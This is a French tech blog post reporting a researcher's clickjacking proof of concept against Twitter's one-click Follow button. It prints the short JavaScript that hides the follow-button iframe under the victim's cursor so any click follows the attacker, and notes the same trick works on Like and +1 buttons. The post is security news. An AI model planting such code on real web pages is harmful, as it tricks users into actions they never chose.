Twitter à nouveau victime d'un clickjacking

Image illustrant l'article : Twitter à nouveau victime d'un clickjacking

Twitter à nouveau victime d'un clickjacking

par Korben -

Peu de temps après la mise à disposition par Twitter d’un bouton “Follow” qui permet en 1 click de suivre quelqu’un sur Twitter, Pierre, un chercheur en sécurité a mis au point un proof of concept de click jacking assez fourbe. L’idée est qu’en masquant une iframe contenant un bouton de follow twitter, avec un petit coup de CSS et en en capturant avec du javascript les déplacements de la souris afin de positionner cette iframe sous le curseur de la victime, peu importe l’endroit où celle-ci clique dans la page, hop ça fera des followers de plus à l’attaquant.

Diabolique !

if (!document.getElementsByClassName){ document.getElementsByClassName = function(classname){ for (i=0; i < document.getElementsByTagName("*").length; i++) { if (document.getElementsByTagName("*").item(i).className == classname){ return new Array(document.getElementsByTagName("*").item(i)); } } } } var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0]; twitterFollowIframe.style.position = 'absolute'; twitterFollowIframe.style.opacity = '0.2'; twitterFollowIframe.style.filter = 'alpha(opacity=20)'; document.onmousemove = function(e){ if ( !e ) e = window.event; twitterFollowIframe.style.left = e.clientX - 20; twitterFollowIframe.style.top = e.clientY - 10; }

Si vous voulez voir une démo live du PoC, cliquez ici. Il a mis la transparence à 40% pour que vous puissiez voir le bouton twitter sous votre souris, mais sachez qu’en la mettant à 100%, ce sera totalement invisible.

Oups ;-)

Evidemment, comme vous me l’avez fait remarqué dans les commentaires, cette technique de click jacking peut aussi s’appliquer à d’autres choses comme le Like de Facebook ou le +1 de Google. Les système d’abonnement ou de vote 1 click seront toujours à la merci de ce genre de choses.

Merci à John Jean pour l’info

[Source et photo]

Que faire après le bac quand on est passionné de cybersécurité ?

Contenu partenaire
Logo de l'école de Cybersécurité Guardia
Tracking Matomo Guardia

Entièrement dédiée à la cybersécurité, l'école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l'école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).

Cliquez ici pour en savoir plus